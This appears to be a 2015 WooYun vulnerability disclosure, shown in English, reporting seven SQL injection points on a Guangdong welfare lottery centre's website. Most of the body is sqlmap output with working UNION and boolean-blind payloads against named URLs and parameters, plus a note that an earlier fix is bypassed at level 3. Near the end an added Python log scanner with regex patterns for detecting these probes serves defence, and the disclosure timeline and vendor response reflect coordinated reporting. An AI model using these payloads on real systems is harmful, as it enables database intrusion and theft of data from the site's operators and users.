
Vulnerability summary

Defect ID: wooyun-2015-0117421

Title: Multiple SQL injections (filter bypassable) at a municipal welfare lottery distribution centre in Guangdong Province

Related vendor: 广东省信息安全测评中心 (Guangdong Provincial Information Security Evaluation Center)

Author: 路人甲

Submitted: 2015-06-01 18:28

Fixed: 2015-07-17 10:14

Published: 2015-07-17 10:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to the third-party partner organisation (广东省信息安全测评中心) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-06-01: Details sent to the vendor, awaiting vendor handling
2015-06-02: Vendor confirmed; details disclosed to the vendor only
2015-06-12: Details disclosed to core white hats and relevant domain experts
2015-06-22: Details disclosed to regular white hats
2015-07-02: Details disclosed to intern white hats
2015-07-17: Details disclosed to the public

Brief description:

Multiple injection points exist, and the injections fixed previously can be bypassed by raising the level!~~~

Details:

1. References
WooYun: SQL injection at a municipal welfare lottery distribution centre in Guangdong Province (backend reached; winning numbers could be published from the backend)
WooYun: Four SQL injection points at a municipal welfare lottery distribution centre in Guangdong Province
After reading those two I tried to see whether any injectable spots were left.
I found some, and by raising sqlmap to level 3 the "fixed" points can still be injected!~~~
2. Injection point 1

http://www.czfc.org.cn/kjnum_36x7_mx.asp?krs=2006085


(Screenshots 1.jpg to 4.jpg of this injection point are not reproduced here.)


3. Injection point 2

http://www.czfc.org.cn/kjcx_view.asp (POST)
h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111


Both the qh and kjrq parameters are injectable.
--level 3

sqlmap identified the following injection points with a total of 4511 HTTP(s) requests:
---
Place: POST
Parameter: qh
Type: UNION query
Title: Generic UNION query (32) - 115 columns
Payload: h_key=true&nytypeid=ny36x7&qh=-2237' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,CHR(113)&CHR(107)&CHR(98)&CHR(109)&CHR(113)&CHR(120)&CHR(73)&CHR(109)&CHR(99)&CHR(118)&CHR(69)&CHR(73)&CHR(78)&CHR(78)&CHR(74)&CHR(113)&CHR(107)&CHR(118)&CHR(117)&CHR(113),32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32 FROM MSysAccessObjects%16&kjrq=1111
Place: POST
Parameter: kjrq
Type: UNION query
Title: Generic UNION query (32) - 115 columns
Payload: h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111' UNION ALL SELECT 32,32,32,CHR(113)&CHR(107)&CHR(98)&CHR(109)&CHR(113)&CHR(102)&CHR(115)&CHR(112)&CHR(110)&CHR(82)&CHR(108)&CHR(99)&CHR(111)&CHR(104)&CHR(74)&CHR(113)&CHR(107)&CHR(118)&CHR(117)&CHR(113),32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32 FROM MSysAccessObjects%16
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


--level 1

sqlmap identified the following injection points with a total of 646 HTTP(s) requests:
---
Place: POST
Parameter: kjrq
Type: UNION query
Title: Generic UNION query (NULL) - 115 columns
Payload: h_key=true&nytypeid=ny36x7&qh=11&kjrq=1111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(102)&CHR(104)&CHR(113)&CHR(117)&CHR(104)&CHR(70)&CHR(70)&CHR(109)&CHR(81)&CHR(90)&CHR(106)&CHR(81)&CHR(108)&CHR(113)&CHR(103)&CHR(119)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
back-end DBMS: Microsoft Access


4. Injection point 3

http://www.czfc.org.cn/news/news_show.asp?news_id=897


sqlmap identified the following injection points with a total of 209 HTTP(s) requests:
---
Place: GET
Parameter: news_id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original value)
Payload: news_id=IIF(8293=8293,897,1/0)
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


5. Injection point 4

http://www.czfc.org.cn/txxw_contact2.asp?ProductID=2196


sqlmap identified the following injection points with a total of 35 HTTP(s) requests:
---
Place: GET
Parameter: ProductID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ProductID=2196 AND 5522=5522
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: ProductID=-9251 UNION ALL SELECT NULL,NULL,NULL,CHR(113)&CHR(99)&CHR(121)&CHR(97)&CHR(113)&CHR(78)&CHR(120)&CHR(67)&CHR(102)&CHR(113)&CHR(86)&CHR(77)&CHR(82)&CHR(112)&CHR(121)&CHR(113)&CHR(115)&CHR(102)&CHR(99)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


6. Injection point 5

http://www.czfc.org.cn/gift_search.asp?action=search (POST)
type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1


--level 1

sqlmap identified the following injection points with a total of 655 HTTP(s) requests:
---
Place: POST
Parameter: qh
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=-1521') UNION ALL SELECT NULL,NULL,NULL,CHR(113)&CHR(121)&CHR(108)&CHR(108)&CHR(113)&CHR(76)&CHR(114)&CHR(114)&CHR(109)&CHR(115)&CHR(78)&CHR(113)&CHR(88)&CHR(78)&CHR(69)&CHR(113)&CHR(111)&CHR(99)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&giftNumber=1
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


--level 3

sqlmap identified the following injection points with a total of 2135 HTTP(s) requests:
---
Place: POST
Parameter: startD
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(112)&CHR(67)&CHR(90)&CHR(104)&CHR(119)&CHR(68)&CHR(65)&CHR(113)&CHR(115)&CHR(97)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL FROM MSysAccessObjects%16&endD=2015-5-28&qh=1&giftNumber=1
Place: POST
Parameter: giftNumber
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1')) UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(114)&CHR(112)&CHR(68)&CHR(75)&CHR(104)&CHR(111)&CHR(111)&CHR(106)&CHR(70)&CHR(81)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
Place: POST
Parameter: endD
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(84)&CHR(89)&CHR(104)&CHR(76)&CHR(105)&CHR(73)&CHR(119)&CHR(121)&CHR(83)&CHR(120)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&qh=1&giftNumber=1
Place: POST
Parameter: qh
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17'&startD=2009-01-01&endD=2015-5-28&qh=-6420') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(122)&CHR(119)&CHR(104)&CHR(114)&CHR(120)&CHR(90)&CHR(65)&CHR(87)&CHR(70)&CHR(70)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&giftNumber=1
Place: POST
Parameter: type
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(120)&CHR(117)&CHR(114)&CHR(113)&CHR(114)&CHR(109)&CHR(73)&CHR(107)&CHR(68)&CHR(86)&CHR(106)&CHR(75)&CHR(84)&CHR(68)&CHR(113)&CHR(115)&CHR(105)&CHR(111)&CHR(113),NULL,NULL,NULL FROM MSysAccessObjects%16&startD=2009-01-01&endD=2015-5-28&qh=1&giftNumber=1
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


7. Injection point 6

http://www.czfc.org.cn/gift_search.asp?pagen=5&startD=&endD=&qh=&giftNumber=&action=search&type=%27%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17%27%2C+%27%BA%C3%B2%CA36%27%2C+%27%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15%27%2C+%27%BA%C3%B2%CA26%27%2C+%27%CB%AB%C9%AB%C7%F2%27%2C+%27%B8%A3%B2%CA3D%27 (GET)


sqlmap identified the following injection points with a total of 4564 HTTP(s) requests:
---
Place: GET
Parameter: giftNumber
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagen=5&startD=&endD=&qh=&giftNumber=') AND 3416=3416 AND ('StTz' LIKE 'StTz&action=search&type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17', '%BA%C3%B2%CA36', '%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15', '%BA%C3%B2%CA26', '%CB%AB%C9%AB%C7%F2', '%B8%A3%B2%CA3D'
Place: GET
Parameter: qh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagen=5&startD=&endD=&qh=' AND 4177=4177 AND 'THpF' LIKE 'THpF&giftNumber=&action=search&type='%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17', '%BA%C3%B2%CA36', '%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15', '%BA%C3%B2%CA26', '%CB%AB%C9%AB%C7%F2', '%B8%A3%B2%CA3D'
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


8. Injection point 7

http://www.czfc.org.cn/displayhtml.asp?act=state (POST)
uid=admin&pwd=123456&CookieDate=0&userhidden=2&comeurl=http://www.czfc.org.cn/flash/menu.swf


sqlmap identified the following injection points with a total of 1127 HTTP(s) requests:
---
Place: POST
Parameter: uid
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: uid=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(105)&CHR(99)&CHR(104)&CHR(113)&CHR(118)&CHR(114)&CHR(80)&CHR(121)&CHR(105)&CHR(75)&CHR(86)&CHR(71)&CHR(110)&CHR(117)&CHR(113)&CHR(121)&CHR(100)&CHR(110)&CHR(113) FROM MSysAccessObjects%16&pwd=123456&CookieDate=0&userhidden=2&comeurl=http://www.czfc.org.cn/flash/menu.swf
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access


9. I tested plenty more and will stop here; the experts have already gone deeper and reached the backend!~~~ I won't go into what sensitive information is there!~~~

Proof of vulnerability:

(Screenshot 4.jpg is not reproduced here.)

Fix recommendation:

You know what to do!~~~
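The sqlmap output above shows the probe shapes a defender would look for in IIS logs: UNION ALL SELECT with Access-style CHR()&CHR() concatenation and MSysAccessObjects, IIF() blind probes, numeric tautologies, and the ') / ')) closing boundaries that --level 3 adds over --level 1. The following detection logic is an added example, not part of the original report; the log lines are constructed and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style request log (method, path, query string), not taken from the report.
# Lines 2, 3, 5, 6 and 7 mimic the probe shapes shown in the sqlmap output above.
SAMPLE_LOG = """\
GET /news/news_show.asp news_id=897
GET /news/news_show.asp news_id=IIF(8293%3D8293,897,1/0)
GET /txxw_contact2.asp ProductID=-9251+UNION+ALL+SELECT+NULL,NULL,CHR(113)%26CHR(99)+FROM+MSysAccessObjects%16
POST /kjcx_view.asp h_key=true&qh=11&kjrq=1111
POST /gift_search.asp qh=-1521%27)+UNION+ALL+SELECT+NULL+FROM+MSysAccessObjects%16
GET /gift_search.asp qh=%27+AND+4177%3D4177+AND+%27THpF%27+LIKE+%27THpF
POST /gift_search.asp startD=2009-01-01%27))+UNION+ALL+SELECT+NULL,NULL+FROM+MSysAccessObjects%16
"""

# Each rule names a probe family; matching runs on the URL-decoded, lower-cased query.
RULES = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    # Access has no CONCAT: sqlmap glues CHR() calls with '&', a strong Access-specific signal.
    ("access_chr_concat", re.compile(r"chr\(\d+\)\s*&\s*chr\(\d+\)")),
    ("access_system_table", re.compile(r"\bmsysaccessobjects\b")),
    ("access_iif_blind", re.compile(r"\biif\(")),
    ("tautology", re.compile(r"\band\s+(\d+)\s*=\s*\1\b")),
    # ') and ')) closers are what --level 3 adds over --level 1, and what the earlier fix missed.
    ("closing_boundary", re.compile(r"'\)+\s*(union|and|or)\b")),
]

def classify_request(query):
    """Return the sorted list of rule names that match one raw query string."""
    decoded = unquote_plus(query).lower()
    return sorted(name for name, rx in RULES if rx.search(decoded))

def scan_log(text):
    """Return (method, path, hits) for every log line that triggers at least one rule."""
    findings = []
    for line in text.splitlines():
        method, path, query = line.split(" ", 2)
        hits = classify_request(query)
        if hits:
            findings.append((method, path, hits))
    return findings

if __name__ == "__main__":
    for method, path, hits in scan_log(SAMPLE_LOG):
        print(method, path, ", ".join(hits))
```

A filter that only rejects a bare quote followed by UNION would pass lines 5 and 7 untouched, which is exactly the level-3 bypass the report describes; the real fix is parameterised queries, with detection like this as a second layer.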

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-06-02 10:12

Vendor reply:

Thank you very much for your report.
The issues in the report have been confirmed and reproduced.
Affected data: High
Attack cost: Low
Impact: High
Overall rating: High, rank: 10
We are contacting the responsible site operator to handle it.

Latest status:

None yet

